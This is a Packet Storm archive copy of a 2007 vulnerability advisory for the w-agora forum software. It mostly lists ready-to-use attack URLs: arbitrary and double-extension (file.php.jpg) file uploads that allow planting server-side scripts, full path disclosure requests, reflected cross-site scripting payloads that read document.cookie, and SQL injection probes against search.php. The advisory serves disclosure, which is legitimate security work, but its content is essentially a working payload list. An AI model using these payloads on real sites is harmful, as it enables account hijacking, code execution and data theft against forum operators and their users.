exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wagora-multi.txt

wagora-multi.txt
Posted Mar 21, 2007
Authored by laurent gaffie

w-agora suffers from file upload, full patch disclosure, cross site scripting and SQL injection flaws.

tags | exploit, xss, sql injection, file upload
SHA-256 | 3efd765d970df008d312b5e83159a95f0e0ff9bac3d35929954a7b793a1a3995

wagora-multi.txt

Change Mirror Download
vendor website: http://www.w-agora.com/
bug: multiples file upload,xss,full path disclosure,error sql
global risk: critical

file upload :
there's actually 2 ways to upload a file on w-agora :

1)on the forum you can post some attached file with your message and you can upload any kind of file
then your file will be located here :
site.com/w-agora/forums/hello/hello/notes/ ( hello = name of the forum ) then you can just browse :site.com/w-agora/forums/
to find out where is your file.

2) http://site.com/w-agora/browse_avatar.php?site=hello ( replace hello , by your forum name. )
with this script you can upload any file with a double extension like : file.php.jpg
the file will be located here :
http://site.com/w-agora/images/avatars/file.php.jpg


full path:
http://site.com/w-agora/rss.php?site=blablablablabla
http://site.com/w-agora/rss.php?site=agora&bn=blibloubla
http://site.com/w-agora/rss.php?site[]=agora
http://site.com/w-agora/rss.php?site=agora&bn[]=
http://site.com/w-agora/index.php?site[]=hello
http://site.com/w-agora/index.php?site=hello&bn[]=
http://site.com/w-agora/profile.php?site[]=
http://site.com/w-agora/search.php?bn[]=
http://site.com/w-agora/index.php?bn=hello_hello&sort[]=subject
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern[]=1
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date[]=0


xss get :
http://site.com/w-agora/profile.php?site=hello&showuser='"><script>alert(document.cookie)</script>
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum='"><script>alert(document.cookie)</script>
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum=hello_hello&search_mode=0&search_user='"><script>alert(document.cookie)</script>
http://site.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&passwd=1&site=hello&userid='"><script>alert(document.cookie)</script>


error sql :
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum='[sql]
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&search_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum=hello_hello&search_mode=0&search_user='[sql]

regards laurent gaffiƩ
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close